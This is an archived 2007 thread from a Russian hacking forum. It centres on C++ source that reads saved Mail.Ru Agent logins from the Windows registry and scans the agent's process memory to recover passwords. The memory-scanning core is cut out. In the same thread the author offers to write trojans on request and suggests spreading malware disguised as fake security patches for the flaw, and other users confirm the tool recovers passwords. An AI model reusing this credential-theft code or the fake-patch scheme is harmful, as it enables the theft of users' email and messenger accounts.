ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.01.2007, 20:48
|
|
Новичок
Регистрация: 12.01.2007
Сообщений: 22
Провел на форуме:
51085
Репутация:
14
|
|
Сообщение от fucker"ok
Мда. Мембер, который пишет на С++ программы размером 11kb не стал бы орать "запустите плиз!!! Очень надо!"
(имхо)Да и проще перехватить данные пре пересылке (за основу можно взять снифер nerezus'а.) логин\пароль передаются в открытом виде, без всяких хешей (сам знаю, ковырялся в протоколе)
Вот не надо гнать только! Яж никого не напрягаю.. Повторюсь, прога весит 10 кил, так как запакована UPX кто не знает что это, ваши проблемы. А че говорить! Не суть..
|
|
|
12.01.2007, 22:15
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499
Репутация:
807
|
|
Я буду тестировать, а то тут все испугались.
Последний раз редактировалось freddi; 12.01.2007 в 22:22..
|
|
|
|
13.01.2007, 00:16
|
|
Познающий
Регистрация: 27.12.2006
Сообщений: 53
Провел на форуме:
526460
Репутация:
48
|
|
Сообщение от freddi
Я буду тестировать, а то тут все испугались.
ну и как? Работает? Или пароли меняешь=)
|
|
|
|
13.01.2007, 00:45
|
|
Новичок
Регистрация: 12.01.2007
Сообщений: 22
Провел на форуме:
51085
Репутация:
14
|
|
PHP код:
[QUOTE=_hack_ing_]ну ты суперпуперпрограммистмегахэцкер, ну не такие мы умные, как ты, ну не знаем мы шо ето такое и чем едят=) просто сам головой, или чем это там, подумай?! Я пишу те: я пипец программер, написал програмульку кот ломает фсе мыльники, скачай!!! и еще проверь как она работает, а то я сам не знаю, как она работает 0_о ню давай исходники кому-нить одному и он проверить, ф чем проблема?)[/QUOTE]
Лови мега хацкер...
#include <windows.h>
#include <stdio.h>
#include<tlhelp32.h>
//--------------------------------------------
//--------------------------------------------
//--------------------------------------------
//--------------------------------------------
BOOL ParsingMagentDump(BYTE *, int, int);
//--------------------------------------------
//--------------------------------------------
bool fl_ = 0;
//--------------------------------------------
//--------------------------------------------
void printf_(char *msg)
{
char tmp[255];
sprintf(tmp,msg);
CharToOem(tmp,tmp);
printf("%s\n",tmp);
}
//--------------------------------------------
//--------------------------------------------
void write_file(BYTE* b, long i)
{
HANDLE hFile = CreateFile("C:\\magent.pas",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if(hFile != INVALID_HANDLE_VALUE)
{
DWORD ret;
if (!fl_)
{
fl_ = 1;
printf_("Файл C:\\magent.pas создан..");
}
SetFilePointer(hFile, 0, 0, FILE_END);
WriteFile(hFile,&b[0],i,&ret,NULL);
CloseHandle(hFile);
} else
printf_("Ошибка создания или открытия файла C:\\magent.pas..");
}
//--------------------------------------------
//--------------------------------------------
void start_scanmmemory()
{
HKEY key = 0;
printf_("Берем данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");
if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Mail.Ru\\Agent\\mra_logins",0,KEY_READ, &key) == ERROR_SUCCESS)
{
char svValueName[MAX_PATH];
memset(&svValueName,0,MAX_PATH);
int count=0;
DWORD cbValueNameLen = MAX_PATH;
DWORD cbValueDataLen = MAX_PATH;
DWORD dwType,pasLen;
char ttt[255];
while(RegEnumValue(key,count,svValueName,&cbValueNameLen,NULL,&dwType,NULL,&cbValueDataLen)!=ERROR_NO_MORE_ITEMS)
{
if (strlen(svValueName) > 0)
{
sprintf(ttt,"Логин : %s",svValueName);
printf_(ttt);
BYTE g[255];
BYTE login[255];
memset(&g,0,255);
memset(&login,0,255);
RegQueryValueEx(key,svValueName,NULL,&dwType,g,&pasLen);
int i = strlen(svValueName);
memcpy(login,&svValueName[0],strlen(svValueName));
memcpy(&login[i],g,4);
sprintf(ttt,"Размер пароля : %d",pasLen-4);
printf_(ttt);
i+=4;
ParsingMagentDump(login, i, pasLen);
}
memset(&svValueName,0,MAX_PATH);
cbValueNameLen = MAX_PATH;
cbValueDataLen = MAX_PATH;
count++;
}
if (count == 0)
printf_("Ошибка! Не удалось взять данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");
RegCloseKey(key);
} else
printf_("Ошибка! Не удалось взять данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");
}
//--------------------------------------------
//--------------------------------------------
BOOL ParsingMagentDump(BYTE * login, int ls, int ps)
{
printf_("Сканим список процессов, ищем magent.exe...");
HANDLE hProcessSnap;
PROCESSENTRY32 pe32;
HANDLE hProcess = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hProcessSnap == INVALID_HANDLE_VALUE) return false;
// .......................
// Посмотрели и хватит!!!!
}
offset++;
if (offset > (0x800000) || fl) break;
}
} else
printf_("Не удалось найти процесс Magent.exe в списке процессов...");
CloseHandle(hProcessSnap);
return fl;
}
//--------------------------------------------
//--------------------------------------------
int main(int argc, char* argv[])
{
start_scanmmemory();
printf_("Работа закончена!");
return 0;
}
Последний раз редактировалось Constantine; 26.01.2007 в 20:49..
Причина: ИСПОЛЬЗУЕМ ТЕГИ!!!
|
|
|
|
13.01.2007, 03:14
|
|
Познающий
Регистрация: 19.01.2006
Сообщений: 58
Провел на форуме:
108297
Репутация:
6
|
|
ну ппц. Взяди бы и на виртуальной тачке бы запустили эту хрень, если боитесь))))
|
|
|
|
13.01.2007, 15:00
|
|
Постоянный
Регистрация: 10.10.2006
Сообщений: 316
Провел на форуме:
1572471
Репутация:
152
|
|
Сообщение от _hack_ing_
ну ты суперпуперпрограммистмега хэцкер, ну не такие мы умные, как ты, ну не знаем мы шо ето такое и чем едят=) просто сам головой, или чем это там, подумай?! Я пишу те: я пипец программер, написал програмульку кот ломает фсе мыльники, скачай!!! и еще проверь как она работает, а то я сам не знаю, как она работает 0_о ню давай исходники кому-нить одному и он проверить, ф чем проблема?)
Если ты не шаришь в программировании, то лучше помолчи и не делай свои выводы "правильные", КУЛЦ МЕГА ХАЦКЕР И ПРОГРАММЕР. И как те сказали - харошь флудить.
2 darkf0x - ты решил траблу с записью всего процесса в файл ? И вообще, когда тя мона в ICQ найти ?
Последний раз редактировалось Constantine; 26.01.2007 в 20:56..
Причина: прекратите оскорбления юзеров
|
|
|
|
13.01.2007, 15:52
|
|
Новичок
Регистрация: 12.01.2007
Сообщений: 22
Провел на форуме:
51085
Репутация:
14
|
|
Сообщение от Ci5
ПЕСДОС, если ты не шаришь в программировании, то лучше помолчи и не делай свои выводы "правильные", КУЛЦ МЕГА ХАЦКЕР И ПРОГРАММЕР. И как те сказали - харошь флудить.
2 darkf0x - ты решил траблу с записью всего процесса в файл ? И вообще, когда тя мона в ICQ найти ?
В будние дни постоянно.. В выходные изредка! =( Проблемы решил! Оказалось все тривиально! Хотя мне не нравится скорость перебора памяти.. Сейчас прикидываю как сразу вычислить относительный адрес сегмента, без тупого брута! =( Мыслишки есть! А так если есть желание пишите на dark_f0x@mail.ru или anclave2007@yandex.ru
Есть интересные мысли! Кстати эту "уязвимость" можно использовать для Фэйков! Народ пользуется почтовыми агентами, если официально всплывет, что он хачится просто, тогда можно фейки делать, типа заплаток от этой уязвимости! =) Ну а там все ограничивается фантазией хакера! Ну да ладно стучите кому интересно! Могу писать что угодно! =) Если грамотно поставите задачу можно написать прикольные трояные!
Программингом даавно занимаюсь и работаю программером... Пишу от сервисов до мультипотоковых приложений, от сокетовых приложений до прог под покеты...
P.S. Многие скептически отнеслись к моим постам, я понимаю, хотя не хотел ни кого пресаннуть!
|
|
|
|
13.01.2007, 18:36
|
|
Banned
Регистрация: 18.05.2006
Сообщений: 150
Провел на форуме:
769625
Репутация:
96
|
|
lascer private 8.5 орёт что троянский червь
|
|
|
|
13.01.2007, 18:42
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
А мне не нравится пост. Я поставлю -2
|
|
|
|
13.01.2007, 19:28
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499
Репутация:
807
|
|
darkf0x Маладец!
Все работает, в инет не лезет(те пароли ващи не отправляет никому), пароль от агента нашол, но у меня стояла галочка его сохранить. Довольно быстро, гдето за 1 минуту.
Так что уберите минус у него!!!!
Последний раз редактировалось freddi; 14.01.2007 в 00:28..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
